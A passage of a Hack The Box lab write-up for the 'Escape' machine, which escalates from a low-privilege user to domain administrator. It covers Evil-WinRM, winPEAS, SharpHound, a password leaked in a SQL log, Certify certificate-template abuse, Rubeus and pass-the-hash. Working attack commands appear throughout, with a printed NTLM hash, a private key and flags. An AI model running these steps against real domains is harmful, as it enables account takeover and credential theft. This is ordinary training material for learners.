d-----         2/7/2023   8:10 AM                sql_svc

Obviously, this user can’t do much. You need a winPEAS session. We load the scanner on the BOX through the features made available by Evil-WinRM…

[...]
*Evil-WinRM* PS C:Userssql_svc> upload ../upld/winPEAS.bat /users/sql_svc/winPEAS.bat
Info: Uploading ../upld/winPEAS.bat to /users/sql_svc/winPEAS.bat

                                                             
Data: 47928 bytes of 47928 bytes copied

Info: Upload successful!

…and start it, saving the result so as not to lose it.

./winPEAS.bat | tee wpeas.output

Let’s take it home the same way and analyze it.

[...]
*Evil-WinRM* PS C:Userssql_svc> download /users/sql_svc/wpeas.output ./wpeas.output
Info: Downloading /users/sql_svc/wpeas.output to ./wpeas.output

                                                             
Info: Download successful!

winpeas

Below is the information extracted from the winPEAS scan that I deemed worthy of note.

[...]
 [+] WSUS                                                                                                                                                                                                
   [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)                                                                                                                               
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus                                                                                                             
[...]
PRIVILEGES INFORMATION                                                                                                                                                                                   
----------------------                                                                                                                                                                                   
                                                                                                                                                                                                         
Privilege Name                Description                    State                                                                                                                                       
============================= ============================== =======                                                                                                                                     
SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                                     
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                                     
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                                                                                                     
[...]
 [+] DPAPI MASTER KEYS                                                                                                                                                                                   
   [i] Use the Mimikatz 'dpapi::masterkey' module with appropriate arguments (/rpc) to decrypt                                                                                                           
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi                                                                                                            
                                                                                                                                                                                                         
                                                                                                                                                                                                         
    Directory: C:Userssql_svcAppDataRoamingMicrosoftProtect                                                                                                                                        
                                                                                                                                                                                                         
                                                                                                                                                                                                         
Mode                LastWriteTime         Length Name                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                    
d---s-       11/19/2022   3:11 AM                S-1-5-21-4078382237-1492182817-2568127209-1106                                                                                                          
[...]
C:WindowsPanthersetupinfo                                                                                                                                                                             
C:WindowsSystem32ntds.dit                                                                                                                                                                             
C:WindowsSystem32configSAM                                                                                                                                                                           
C:WindowsSystem32configSYSTEM                                                                                                                                                                        
C:WindowsSystem32configRegBackSAM                                                                                                                                                                   
C:WindowsSystem32configRegBackSYSTEM                                                                                                                                                                
[...]

Obviously, in addition to some interesting files, the possible privileges available to the user are highlighted (to verify actual vulnerabilities) and the WSUS windows update service (often used precisely for the elevation of privileges).
Let’s try to understand if the WSUS is really vulnerable.

*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svc> reg query HKLMSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated
reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate /v WUServer


reg.exe : ERROR: The system was unable to find the specified registry key or value.
    + CategoryInfo          : NotSpecified: (ERROR: The syst...y key or value.:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdate 

HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
*Evil-WinRM* PS C:Userssql_svcDocuments> reg query HKLMSoftwarePoliciesMicrosoftWindowsWindowsUpdateAU

HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAU
    AUOptions    REG_DWORD    0x3

HKEY_LOCAL_MACHINESoftwarePoliciesMicrosoftWindowsWindowsUpdateAUNoAutoUpdate
*Evil-WinRM* PS C:Userssql_svcDocuments>

Already from the windows registry keys, there doesn’t seem to be any hope.
Even on the privileges front, nothing particularly attractive seems to be highlighted, the masterkey of the user Ryan would be needed, but at the moment it does not seem to be available.
Let’s try some other tools, for example, PrivescCheck.

PrivescCheck output

Also in this case I report only the interesting and noteworthy things.

[...]
+------+------------------------------------------------+------+
| TEST | APPS > Non-default Apps                        | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate non-default and third-party applications by |
|      | parsing the registry.                                 |
+------+-------------------------------------------------------+
[*] Found 6 result(s).

Name                         FullName                                     
----                         --------                                     
Microsoft SQL Server         C:Program Files (x86)Microsoft SQL Server  
Microsoft                    C:Program FilesMicrosoft                   
Microsoft SQL Server         C:Program FilesMicrosoft SQL Server        
Microsoft Visual Studio 10.0 C:Program FilesMicrosoft Visual Studio 10.0
VMware                       C:Program FilesVMware                      
VMware Tools                 C:Program FilesVMwareVMware Tools         
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date? (info)            | INFO |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes by       |
|      | parsing the registry. If this fails, the check will   |
|      | fall back to the built-in 'Get-HotFix' cmdlet.        |
+------+-------------------------------------------------------+
[*] Found 9 result(s).

HotFixID  Description     InstalledBy                                  InstalledOn          
--------  -----------     -----------                                  -----------          
KB5011551 Update          NT AUTHORITYSYSTEM                          2023-02-02 - 13:18:08
KB5011574 Update          sequelAdministrator                         2023-02-02 - 12:07:20
KB4512578 Security Update sequelAdministrator                         2023-02-01 - 23:13:20
KB4589208 Update          NT AUTHORITYSYSTEM                          2023-02-01 - 21:10:30
KB5012170 Security Update sequelAdministrator                         2023-02-01 - 21:00:27
KB5020374 Security Update NT AUTHORITYSYSTEM                          2023-02-01 - 19:29:33
KB4512577 Security Update S-1-5-21-89493159-3068390195-4120627384-1047 2019-09-06 - 17:24:38
KB5020866 Update                                                       1600-12-31 - 16:00:00
KB4514366 Update                                                       1600-12-31 - 16:00:00
[...]
+------+------------------------------------------------+------+
| TEST | UPDATES > System up to date?                   | VULN |
+------+------------------------------------------------+------+
| DESC | Enumerate the installed updates and hotfixes and      |
|      | check whether a patch was applied in the last 31      |
|      | days.                                                 |

[*] Found 1 result(s).

HotFixID  Description InstalledBy         InstalledOn          
--------  ----------- -----------         -----------          
KB5011551 Update      NT AUTHORITYSYSTEM 2023-02-02 - 13:18:08
[...]
+------+------------------------------------------------+------+
| TEST | MISC > OS Version                              | INFO |
+------+------------------------------------------------+------+
| DESC | Print the detailed version number of the Operating    |
|      | System. If we can't get the update history, this      |
|      | might be useful.                                      |
+------+-------------------------------------------------------+
[*] Found 1 result(s).

Name                         Version                             
----                         -------                             
Windows Server 2019 Standard 10.0.17763 Version 1809 (17763.2746)
[...]

We get to a point where the use of classic windows tools becomes essential, let’s try bloodhound.

I collect the necessary information…

*Evil-WinRM* PS C:Userssql_svc> upload ./attack/upld/SharpHound.exe ../sh.exe
Info: Uploading ./attack/upld/SharpHound.exe to ../sh.exe

                                                             
Data: 1402196 bytes of 1402196 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:Userssql_svc> ./sh.exe -c All --zipfilename output.zip
2023-03-25T23:50:54.5149380-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2023-03-25T23:50:54.6555838-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:54.6868023-07:00|INFORMATION|Initializing SharpHound at 11:50 PM on 3/25/2023
2023-03-25T23:50:55.0305487-07:00|INFORMATION|Loaded cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:50:55.0461913-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2023-03-25T23:50:55.1868496-07:00|INFORMATION|Beginning LDAP search for sequel.htb
2023-03-25T23:50:55.2336792-07:00|INFORMATION|Producer has finished, closing LDAP channel
2023-03-25T23:50:55.2336792-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2023-03-25T23:51:25.2383915-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 40 MB RAM
2023-03-25T23:51:39.5292927-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2023-03-25T23:51:39.5605157-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Status: 97 objects finished (+97 2.204545)/s -- Using 42 MB RAM
2023-03-25T23:51:39.6386454-07:00|INFORMATION|Enumeration finished in 00:00:44.4448376
2023-03-25T23:51:39.7011650-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
 56 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2023-03-25T23:51:39.7167826-07:00|INFORMATION|SharpHound Enumeration Completed at 11:51 PM on 3/25/2023! Happy Graphing!

*Evil-WinRM* PS C:Userssql_svc> download ./20230325235139_output.zip ./attack/dwnl/20230325235139_output.zip
Info: Downloading ./20230325235139_output.zip to ./attack/dwnl/20230325235139_output.zip

                                                             
Info: Download successful!

*Evil-WinRM* PS C:Userssql_svc>

…and analyze the result.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ xhost +local:$(id -nu)
non-network local connections being added to access control list
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo docker run -it  
  -p 7474:7474 
  -p 7687:7687 
  -e DISPLAY=unix$DISPLAY 
  -v /tmp/.X11-unix:/tmp/.X11-unix 
  --device=/dev/dri:/dev/dri 
  -v ~/temp:/data 
  --network host 
  --name bloodhound belane/bloodhound
WARNING: Published ports are discarded when using host network mode
Selecting JVM - Version:11.0.16+8-post-Debian-1deb11u1, Name:OpenJDK 64-Bit Server VM, Vendor:Debian
Changed password for user 'neo4j'. IMPORTANT: this change will only take effect if performed before the database is started for the first time.
Directories in use:
home:         /var/lib/neo4j
config:       /etc/neo4j
logs:         /var/log/neo4j
plugins:      /var/lib/neo4j/plugins
import:       /var/lib/neo4j/import
data:         /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses:     /var/lib/neo4j/licenses
run:          /var/lib/neo4j/run
Starting Neo4j.
Started neo4j (pid:84). It is available at http://localhost:7474
There may be a short delay until the server is ready.
*** Log in with bolt://127.0.0.1:7687 (neo4j:blood) ***

I use the containerized version, so wait for the availability of the Neo4j.

When logged in, upload the collected data (directly zip file).
Now, on the search box, search for the user you pawn: sql_svc.
Select it and mark the user as owned.
Search for the Ryan user account and select it, right-click and chose “shortest path from owned to here“

Well, the path is long enough, but the tool crashes as soon as you try to investigate the third link. Nonetheless, the information from previous nodes highlights standard attacks that I’ve faced in the past. Let’s try them quickly.

Again, however, nothing seems to emerge. The commands you run seem to throw an error while generating the security object; another hole in the water.

I’m starting to feel this dead end approaching, but I still have some resources, let’s try some exploits suggester for Windows.

*Evil-WinRM* PS C:Userssql_svcDocuments> systeminfo > systeminfo.txt
Program 'systeminfo.exe' failed to run: Access is deniedAt line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ systeminfo > systeminfo.txt
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException
    + FullyQualifiedErrorId : NativeCommandFailed

Once again blocked even before starting. Next another.

*Evil-WinRM* PS C:Userssql_svcDocuments> cscript.exe missingkbs.vbs
Microsoft (R) Windows Script Host Version 5.812
Copyright (C) Microsoft Corporation. All rights reserved.

Windows Exploit Suggester: Missing KBs Identifier v1.0
https://github.com/bitsadmin/wesng/

cscript.exe : [-] This script needs to be executed as an elevated Administrator
    + CategoryInfo          : NotSpecified: ([-] This script...d Administrator:String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError

Exhausted and out of ideas, I abandon my goal for a few days (needless to tell us, when you slam too much on the same apparently unsolvable problem, disconnect… let your mind refresh, empty and face the problem again).

As you can see, I was stubborn in the search for an advanced exploit and my belief that the resolution depended on it did not take my eyes off a dead end in which I was closed for several days. But sometimes simplicity and banality are the most improbable and unexpected ways.

So I go back to the machine after a few days and with the memories of all the attempts tried up to that moment, I go back to having a look at the resources available from the shell. I then find a folder on the root containing what appears to be the SQL Server installation package and a couple of other directories one of which contains a backup file.

*Evil-WinRM* PS C:sqlserver> dir -force


    Directory: C:sqlserver


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:06 AM                Logs
d-----       11/18/2022   1:37 PM                SQLEXPR_2019
-a----       11/18/2022   1:35 PM        6379936 sqlexpress.exe
-a----       11/18/2022   1:36 PM      268090448 SQLEXPR_x64_ENU.exe


*Evil-WinRM* PS C:sqlserver> cd logs
*Evil-WinRM* PS C:sqlserverlogs> dir -force


    Directory: C:sqlserverlogs


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         2/7/2023   8:06 AM          27608 ERRORLOG.BAK

I start sifting through the log file and find two consecutive failed accesses within a few…. hundredths of a second (it seems a bit exaggerated to me, but we’ll stick to the clues).

*Evil-WinRM* PS C:sqlserverlogs> type ERRORLOG.BAK
2022-11-18 13:43:05.96 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
        Sep 24 2019 13:48:23
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
[...]
2022-11-18 13:43:07.44 spid51      Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51      Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon       Logon failed for user 'sequel.htbRyan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon       Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon       Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51      Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[...]

All we have to do is reconnect with Evil-WinRM using the new credentials.

┌──(in7rud3r㉿kali-muletto)-[~/…/_10.10.11.202 - Escape (win)/attack/upld/sggstr]
└─$ evil-winrm -i 10.10.11.202 -u Ryan.Cooper -p NuclearMosquito3 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:UsersRyan.CooperDocuments> cd ..desktop
*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> dir


    Directory: C:UsersRyan.Cooperdesktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         4/1/2023   4:23 PM             34 user.txt


*Evil-WinRM* PS C:UsersRyan.Cooperdesktop> type user.txt
f******************************5

And the first flag is captured. Ok, at this point the steps repeat as before. Unfortunately also in this case, nothing with winPEAS, nothing with BloodHound, nothing with PowerScript and Rubeus; another dead end.

As exhausted, I rely on the suggestions of the forum and thus discover a new (for me) interesting tool: “just download the Certify.exe“.

It looks really interesting, let’s see what comes out.

*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Certify.exe find /vulnerable

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _  '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  ________|_|   __|_|_|  __, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'

[*] Listing info about the Enterprise CA 'sequel-DC-CA'

    Enterprise CA Name            : sequel-DC-CA
    DNS Hostname                  : dc.sequel.htb
    FullName                      : dc.sequel.htbsequel-DC-CA
    Flags                         : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
    Cert SubjectName              : CN=sequel-DC-CA, DC=sequel, DC=htb
    Cert Thumbprint               : A263EA89CAFE503BB33513E359747FD262F91A56
    Cert Serial                   : 1EF2FA9A7E6EADAD4F5382F4CE283101
    Cert Start Date               : 11/18/2022 12:58:46 PM
    Cert End Date                 : 11/18/2121 1:08:46 PM
    Cert Chain                    : CN=sequel-DC-CA,DC=sequel,DC=htb
    UserSpecifiedSAN              : Disabled
    CA Permissions                :
      Owner: BUILTINAdministrators        S-1-5-32-544

      Access Rights                                     Principal

      Allow  Enroll                                     NT AUTHORITYAuthenticated UsersS-1-5-11
      Allow  ManageCA, ManageCertificates               BUILTINAdministrators        S-1-5-32-544
      Allow  ManageCA, ManageCertificates               sequelDomain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
      Allow  ManageCA, ManageCertificates               sequelEnterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
    Enrollment Agent Restrictions : None

[!] Vulnerable Certificates Templates :

    CA Name                               : dc.sequel.htbsequel-DC-CA
    Template Name                         : UserAuthentication
    Schema Version                        : 2
    Validity Period                       : 10 years
    Renewal Period                        : 6 weeks
    msPKI-Certificate-Name-Flag          : ENROLLEE_SUPPLIES_SUBJECT
    mspki-enrollment-flag                 : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
    Authorized Signatures Required        : 0
    pkiextendedkeyusage                   : Client Authentication, Encrypting File System, Secure Email
    mspki-certificate-application-policy  : Client Authentication, Encrypting File System, Secure Email
    Permissions
      Enrollment Permissions
        Enrollment Rights           : sequelDomain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequelDomain Users           S-1-5-21-4078382237-1492182817-2568127209-513
                                      sequelEnterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
      Object Control Permissions
        Owner                       : sequelAdministrator          S-1-5-21-4078382237-1492182817-2568127209-500
        WriteOwner Principals       : sequelAdministrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequelDomain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequelEnterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteDacl Principals        : sequelAdministrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequelDomain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequelEnterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519
        WriteProperty Principals    : sequelAdministrator          S-1-5-21-4078382237-1492182817-2568127209-500
                                      sequelDomain Admins          S-1-5-21-4078382237-1492182817-2568127209-512
                                      sequelEnterprise Admins      S-1-5-21-4078382237-1492182817-2568127209-519



Certify completed in 00:00:10.2338568

As in the example given in the git repository documentation, our user also seems to be enabled for the ManageCA privilege (but what a coincidence). Go on.

*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Certify.exe request /ca:dc.sequel.htbsequel-DC-CA /template:UserAuthentication /altname:Administrator

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _  '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  ________|_|   __|_|_|  __, |
                             __/ |
                            |___./
  v1.1.0

[*] Action: Request a Certificates

[*] Current user context    : sequelRyan.Cooper
[*] No subject name specified, using current context as subject.

[*] Template                : UserAuthentication
[*] Subject                 : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName                 : Administrator

[*] Certificate Authority   : dc.sequel.htbsequel-DC-CA

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 12

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvG6vT+UG9HVxfQllC9sDCLkgIe2yUKOCnLEhaQXtDnjyqtik
k/afDQlLoFFzrtRSkkVEdad8FTv0Jp/k0jggUemH32mTkFncol1eMyFJC4HCHmGc
[...]
2fyAvkVl6e0kkDoE4XFqX4FnVTlnC6RlR9xzlaeJRkZEzCzhPqAI1tahkcV9JOU9
ZxtxrK8ZgGYY9lXCH2kXZ76NEAvnaY167v6EmNyKWo2Yh1X9V8A=
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIGEjCCBPqgAwIBAgITHgAAAAxRrpFSnZZtuQAAAAAADDANBgkqhkiG9w0BAQsF
ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
[...]
it7yHBHqFb0JX/RS/++fW1VN+oI5ZX0juicCdqvON7i1s1kTth7dkfa7Ae3sm3SU
exO2srhH7p4l/Z6l8mwODDbCnantdw==
-----END CERTIFICATE-----


[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx



Certify completed in 00:00:13.3681079

Create the pfx key from the recovered certificate.

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
                                                                                                                                                                                                         
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/cert]
└─$ ls -la
total 16
drwxr-xr-x 2 in7rud3r in7rud3r 4096 Apr  5 17:48 .
drwxr-xr-x 6 in7rud3r in7rud3r 4096 Apr  5 17:46 ..
-rw-r--r-- 1 in7rud3r in7rud3r 3842 Apr  5 17:47 cert.pem
-rw------- 1 in7rud3r in7rud3r 3409 Apr  5 17:48 cert.pfx

And we ask for the resolution of the TGT key.

*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx

   ______        _
  (_____       | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ | ___ | | | |/___)
  | |   | |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htbAdministrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBEnvQzQSZedn
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNTUxNDVaphEYDzIwMjMwNDA2MTU1MTQ1WqcRGA8yMDIzMDQxMzA1
      NTE0NVqoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 10:51:45 PM
  EndTime                  :  4/6/2023 8:51:45 AM
  RenewTill                :  4/12/2023 10:51:45 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xXtPDJD44N/LDDFDSZt7lQ==
  ASREP (key)              :  25425F5D4ED1042512BFC036C6A94862

There are two different ways to obtain the hash password (that I know), using ccache…

…or generating it from Rubeus itself; let me use the simplest method.

*Evil-WinRM* PS C:UsersRyan.Cooperdownloads> ./Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials

   ______        _
  (_____       | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ | ___ | | | |/___)
  | |   | |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htbAdministrator'
[*] Using domain controller: fe80::a477:436e:5730:3595%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGSDCCBkSgAwIBBaEDAgEWooIFXjCCBVphggVWMIIFUqADAgEFoQwbClNFUVVFTC5IVEKiHzAdoAMC
      AQKhFjAUGwZrcmJ0Z3QbCnNlcXVlbC5odGKjggUaMIIFFqADAgESoQMCAQKiggUIBIIFBBbDT2EbXfI1
[...]
      BwMFAADhAAClERgPMjAyMzA0MDYwNjE0MTNaphEYDzIwMjMwNDA2MTYxNDEzWqcRGA8yMDIzMDQxMzA2
      MTQxM1qoDBsKU0VRVUVMLkhUQqkfMB2gAwIBAqEWMBQbBmtyYnRndBsKc2VxdWVsLmh0Yg==

  ServiceName              :  krbtgt/sequel.htb
  ServiceRealm             :  SEQUEL.HTB
  UserName                 :  Administrator
  UserRealm                :  SEQUEL.HTB
  StartTime                :  4/5/2023 11:14:13 PM
  EndTime                  :  4/6/2023 9:14:13 AM
  RenewTill                :  4/12/2023 11:14:13 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable
  KeyType                  :  rc4_hmac
  Base64(key)              :  xiXbj5e7f3J3Xv2+WDcN7A==
  ASREP (key)              :  C877552CA622B1DC65D65CC9007546E9

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : A52F78E4C751E5F5E17E1E9F3E58F4EE

And we run straight to the root flag without delay, once again exploiting the potential of Evil-WinRM.

┌──(in7rud3r㉿kali-muletto)-[~/Dropbox/hackthebox/--==## DONE ##==--]
└─$ evil-winrm -i 10.10.11.202 -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:UsersAdministratorDocuments> whoami
sequeladministrator
*Evil-WinRM* PS C:UsersAdministratorDocuments> type ../Desktop/root.txt
b4c008685abf917ffbf974fddb917a8a
*Evil-WinRM* PS C:UsersAdministratorDocuments>

And once again… that’s all folks, I sweated for a few days, but in the end, I managed to overcome every obstacle (even the most trivial ones, next time, look around before proceeding down the most impervious routes). For the moment, goodbye, but I’ll wait for you at the next BOX, happy hacking everyone!

Secjuice – Read More

Company Blogs

August 29, 2025

WordPress: vulnerabilities in plugins and themes | Kaspersky official blog

August 29, 2025

This month in security with Tony Anscombe – August 2025 edition

August 28, 2025

Link up, lift up, level up

August 28, 2025

NX build compromise detection and response | Kaspersky official blog

August 27, 2025

Libbiosig, Tenda, SAIL, PDF XChange, Foxit vulnerabilities

August 27, 2025

BadCam attack: malicious firmware in “clean” webcams

August 27, 2025

MSSP Growth Guide: Scaling Threat Detection for Expanding Client Base

August 26, 2025

How to remove your information from personal data brokers’ databases | Kaspersky official blog

August 26, 2025

Major Cyber Attacks in August 2025: 7-Stage Tycoon2FA Phishing, New ClickFix Campaign, and Salty2FA

August 22, 2025

Messaging apps that work without an internet connection or cell service | Kaspersky official blog

Hacking Tools

[wp-rss-aggregator feeds="kitploit" limit="10" pagination="off"]

Exploit DB

[wp-rss-aggregator feeds="exploit-db" limit="10" pagination="off"]

BackBox.org offers a range of Penetration Testing services to simulate an attack on your network or application. If you are interested in our services, please contact us and we will provide you with further information as well as an initial consultation.

Click me

Make a Donation